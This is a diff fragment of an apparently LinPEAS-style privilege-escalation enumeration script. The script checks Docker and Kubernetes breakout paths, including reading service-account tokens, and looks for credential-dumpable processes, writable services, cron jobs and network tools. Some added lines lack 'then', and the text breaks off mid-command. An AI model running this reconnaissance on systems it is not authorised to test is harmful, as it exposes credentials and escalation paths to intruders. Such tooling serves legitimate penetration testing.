$DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," - fi - if df -h | grep docker; then - print_2title "Docker Overlays" - df -h | grep docker - fi - fi +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi - if [ "$inContainer" ]; then - echo "" - print_2title "Container & breakout enumeration" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" - print_list "Container ID ...................$NC $(cat /etc/hostname)" - if echo "$containerType" | grep -qi "docker"; then - print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" - fi - if echo "$containerType" | grep -qi "kubernetes"; then - print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" - print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" - fi +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi - checkContainerExploits - print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," - echo "" +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. $VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" - print_2title "Container Capabilities" - capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" - echo "" +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" - print_2title "Privilege Mode" - if [ -x "$(command -v fdisk)" ]; then - if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then - echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," - else - echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," - fi +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," else - echo_not_found + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," fi - echo "" +else + echo_not_found +fi +echo "" - print_2title "Interesting Files Mounted" - (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" - echo "" +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" - print_2title "Possible Entrypoints" - ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq - echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" fi +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if echo $CHECKS | grep -q available_software; +print_title "Available Software" +########################################### +#---------) Available Software (----------# +########################################### -if echo $CHECKS | grep -q Devs; then - ########################################### - #---------------) Devices (---------------# - ########################################### - print_title "Devices" +#-- 1AS) Useful software +print_2title "Useful software" +command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null +echo "" - #-- 1D) sd in /dev - print_2title "Any sd*/disk* disk in /dev? (limit 20)" - ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20 - echo "" +#-- 2AS) Search for compilers +print_2title "Installed Compiler" +(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); +echo "" - #-- 2D) Unmounted - print_2title "Unmounted file-system?" - print_info "Check if you can mount umounted devices" - if [ -f "/etc/fstab" ]; then - grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED}," | sed -${E} "s,$mounted,${SED_BLUE}," | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g" - else - echo_not_found "/etc/fstab" - fi - echo "" - - print_2title "Mounted disks information" - warn_exec diskutil list - echo "" - - print_2title "Mounted SMB Shares" - warn_exec smbutil statshares -a - echo "" - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v pkg 2>/dev/null)" ]; then +print_2title "Vulnerable Packages" +pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" +echo "" fi - -if echo $CHECKS | grep -q AvaSof; then - ########################################### - #---------) Available Software (----------# - ########################################### - print_title "Available Software" - - #-- 1AS) Useful software - print_2title "Useful software" - command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null - echo "" - - #-- 2AS) Search for compilers - print_2title "Installed Compiler" - (dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/"); - echo "" - - if [ "$(command -v pkg 2>/dev/null)" ]; then - print_2title "Vulnerable Packages" - pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g" - echo "" - fi - - if [ "$(command -v brew 2>/dev/null)" ]; then - print_2title "Brew Installed Packages" - brew list - echo "" - fi - - if [ "$MACPEAS" ]; then - print_2title "Writable Installed Applications" - system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - - system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do - if [ -w "$f" ]; then - echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" - fi - done - echo "" - - #Useless info - #print_2title "Developer Tools" - #system_profiler SPDeveloperToolsDataType - #echo "" - fi - - echo "" - if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi +if [ "$(command -v brew 2>/dev/null)" ]; then +print_2title "Brew Installed Packages" +brew list +echo "" fi - -if echo $CHECKS | grep -q ProCronSrvcsTmrsSocks; then - #################################################### - #-----) Processes & Cron & Services & Timers (-----# - #################################################### - print_title "Processes, Cron, Services, Timers & Sockets" - - #-- PCS) Cleaned proccesses - print_2title "Cleaned processes" - if [ "$NOUSEPS" ]; then - printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC - fi - print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - - if [ "$NOUSEPS" ]; then - print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - pslist=$(print_ps) - else - (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do - echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," - if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then - cpid=$(echo "$psline" | awk '{print $2}') - caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" - if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then - printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" - fi - fi - done - pslist=$(ps auxwww) - echo "" - - #-- PCS) Binary processes permissions - print_2title "Binary processes permissions" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" - binW="IniTialiZZinnggg" - ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do - if [ -w "$bpath" ]; then - binW="$binW|$bpath" - fi - done - ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," - fi - echo "" - - #-- PCS) Files opened by processes belonging to other users - if ! [ "$IAMROOT" ]; then - print_2title "Files opened by processes belonging to other users" - print_info "This is usually empty because of the lack of privileges to read other user processes information" - lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - echo "" - fi - - #-- PCS) Processes with credentials inside memory - print_2title "Processes with credentials in memory (root req)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" - if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi - if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi - if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi - if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi - if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi - if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi - echo "" - - #-- PCS) Different processes 1 min - if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then - print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" - temp_file=$(mktemp) - if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi - echo "" - fi - - #-- PCS) Cron - print_2title "Cron jobs" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" - command -v crontab 2>/dev/null || echo_not_found "crontab" - crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - command -v incrontab 2>/dev/null || echo_not_found "incrontab" - incrontab -l 2>/dev/null - ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" - cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," - crontab -l -u "$USER" 2>/dev/null | tr -d "\r" - ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths - atq 2>/dev/null - echo "" - - if [ "$MACPEAS" ]; then - print_2title "Third party LaunchAgents & LaunchDemons" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" - ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null - echo "" - - print_2title "Writable System LaunchAgents & LaunchDemons" - find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do - program="" - program=$(defaults read "$f" Program 2>/dev/null) - if ! [ "$program" ]; then - program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) - fi - if [ -w "$program" ]; then - echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; - fi - done - echo "" - - print_2title "StartupItems" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" - ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null - echo "" - - print_2title "Login Items" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" - osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null - echo "" - - print_2title "SPStartupItemDataType" - system_profiler SPStartupItemDataType - echo "" - - print_2title "Emond scripts" - print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" - ls -l /private/var/db/emondClients - echo "" - fi - - #-- PCS) Services - print_2title "Services" - print_info "Search for outdated versions" - (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" - echo "" - - #-- PSC) systemd PATH - print_2title "Systemd PATH" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" - systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" - WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") - echo "" - - #-- PSC) .service files - #TODO: .service files in MACOS are folders - print_2title "Analyzing .service files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" - printf "%s\n" "$PSTORAGE_SYSTEMD\n" | while read s; do - if [ ! -O "$s" ]; then #Remove services that belongs to the current user - if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then - echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g" - fi - servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths - printf "%s\n" "$servicebinpaths\n" | while read sp; do - if [ -w "$sp" ]; then - echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g" - fi - done - relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/") - relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/") - if [ "$relpath1" ] || [ "$relpath2" ]; then - if [ "$WRITABLESYSTEMDPATH" ]; then - echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},"; - else - echo "$s is executing some relative path" - fi - fi +if [ "$MACPEAS" ]; then +print_2title "Writable Installed Applications" +system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" fi - done - if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi - echo "" +done - #-- PSC) Timers - print_2title "System timers" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - (systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found - echo "" - - #-- PSC) .timer files - print_2title "Analyzing .timer files" - print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#timers" - printf "%s\n" "$PSTORAGE_TIMER\n" | while read t; do - if ! [ "$IAMROOT" ] && [ -w "$t" ]; then - echo "$t" | sed -${E} "s,.*,${SED_RED},g" +system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do + if [ -w "$f" ]; then + echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g" + fi +done + +fi +echo'' +echo'' +if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi + +if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; +print_title "Processes, Crons, Timers, Services and Sockets" +#################################################### +#-----) Processes & Cron & Services & Timers (-----# +#################################################### + +#-- PCS) Cleaned proccesses +print_2title "Cleaned processes" +if [ "$NOUSEPS" ]; then +printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC +fi +print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" + +if [ "$NOUSEPS" ]; then +print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," +pslist=$(print_ps) +else +(ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do + echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED}," + if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then + cpid=$(echo "$psline" | awk '{print $2}') + caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')" + if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then + printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g" + fi + fi +done +pslist=$(ps auxwww) +echo "" + +#-- PCS) Binary processes permissions +print_2title "Binary processes permissions" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#processes" +binW="IniTialiZZinnggg" +ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do + if [ -w "$bpath" ]; then + binW="$binW|$bpath" + fi +done +ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v "$USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN}," +fi +echo "" + +#-- PCS) Files opened by processes belonging to other users +if ! [ "$IAMROOT" ]; then +print_2title "Files opened by processes belonging to other users" +print_info "This is usually empty because of the lack of privileges to read other user processes information" +lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +echo "" +fi + +#-- PCS) Processes with credentials inside memory +print_2title "Processes with credentials in memory (root req)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#credentials-from-process-memory" +if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi +if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi +if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi +if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi +if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi +if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi +echo "" + +#-- PCS) Different processes 1 min +if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then +print_2title "Different processes executed during 1 min (interesting is low number of repetitions)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#frequent-cron-jobs" +temp_file=$(mktemp) +if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi +echo "" +fi + +#-- PCS) Cron +print_2title "Cron jobs" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#scheduled-cron-jobs" +command -v crontab 2>/dev/null || echo_not_found "crontab" +crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +command -v incrontab 2>/dev/null || echo_not_found "incrontab" +incrontab -l 2>/dev/null +ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" +cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#\|test \-x /usr/sbin/anacron\|run\-parts \-\-report /etc/cron.hourly\| root run-parts /etc/cron." | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED}," +crontab -l -u "$USER" 2>/dev/null | tr -d "\r" +ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths +atq 2>/dev/null +echo "" + +if [ "$MACPEAS" ]; then +print_2title "Third party LaunchAgents & LaunchDemons" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd" +ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null +echo "" + +print_2title "Writable System LaunchAgents & LaunchDemons" +find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do + program="" + program=$(defaults read "$f" Program 2>/dev/null) + if ! [ "$program" ]; then + program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2) + fi + if [ -w "$program" ]; then + echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},"; + fi +done +echo "" + +print_2title "StartupItems" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items" +ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null +echo "" + +print_2title "Login Items" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items" +osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null +echo "" + +print_2title "SPStartupItemDataType" +system_profiler SPStartupItemDataType +echo "" + +print_2title "Emond scripts" +print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond" +ls -l /private/var/db/emondClients +echo "" +fi + +#-- PCS) Services +print_2title "Services" +print_info "Search for outdated versions" +(service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl" +echo "" + +#-- PSC) systemd PATH +print_2title "Systemd PATH" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#systemd-path-relative-paths" +systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g" +WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders") +echo "" + +#-- PSC) .service files +#TODO: .service files in MACOS are folders +print_2title "Analyzing .service files" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#services" +printf 